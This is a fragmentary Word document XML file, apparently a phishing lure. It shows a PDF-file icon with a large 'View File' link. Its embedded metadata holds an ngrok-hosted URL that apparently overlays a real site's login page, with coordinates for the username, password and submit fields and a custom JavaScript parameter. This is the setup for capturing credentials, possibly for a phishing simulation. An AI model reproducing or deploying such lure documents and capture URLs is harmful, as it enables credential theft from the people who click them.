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BB9E" w14:textId="77777777" w:rsidR="0005054A" w:rsidRDefault="0005054A"/>
    <w:p w14:paraId="05EE2329" w14:textId="3DBB13E4" w:rsidR="0005054A" w:rsidRDefault="0005054A">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="64D96E20" wp14:editId="5361D637">
            <wp:extent cx="5972810" cy="5972810"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="74986966" name="Picture 1" descr="3d pdf file icon illustration 22361832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 pdf file icon illustration 22361832 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2E61" w14:textId="3D627A4E" w:rsidR="0005054A" w:rsidRDefault="00164C3B" w:rsidP="0005054A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:sz w:val="144"/>
          <w:szCs w:val="144"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId6" w:history="1">
        <w:r w:rsidR="0005054A" w:rsidRPr="0005054A">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="144"/>
            <w:szCs w:val="144"/>
          </w:rPr>
          <w:t>View File</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7DF3AA37" w14:textId="77777777" w:rsidR="00164C3B" w:rsidRDefault="00164C3B" w:rsidP="0005054A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B4F9714" w14:textId="41B7F417" w:rsidR="0005054A" w:rsidRDefault="0005054A"/>
    <w:sectPr w:rsidR="0005054A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4A"/>
    <w:rsid w:val="0005054A"/>
    <w:rsid w:val="00164C3B"/>
    <w:rsid w:val="0020688B"/>
    <w:rsid w:val="0024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E51A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7349CCB8-2498-4343-A6A2-807E4E21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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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5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05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C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060-2409-40f2-2098-7378-f0a1-b455-52dc-a382.ngrok-free.app/click/sandbox.html?target=https://www.printonweb.in/user/login.php&amp;userNameLeft=549&amp;userNameTop=564.9249877929688&amp;passwordLeft=551&amp;passwordTop=636.9249877929688&amp;buttonLeft=737&amp;buttonTop=735.3500366210938%26usernameStyle%3D%26passwordStyle%3D%26buttonStyle%3D%26customJavaScript%3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9C30-DBD9-48B2-876B-E0444B82B9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b139ea-6c0f-483b-849b-f4eb908d0141}" enabled="1" method="Standard" siteId="{ccc63daa-d84b-4abd-98fd-4eeb839de273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rushi (EXTERN: FIOS)</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Sinha, Arushi (EXTERN: FIOS)</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-03-20T12:07:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-03-20T12:20:00Z</dcterms:modified>
</cp:coreProperties>
</file>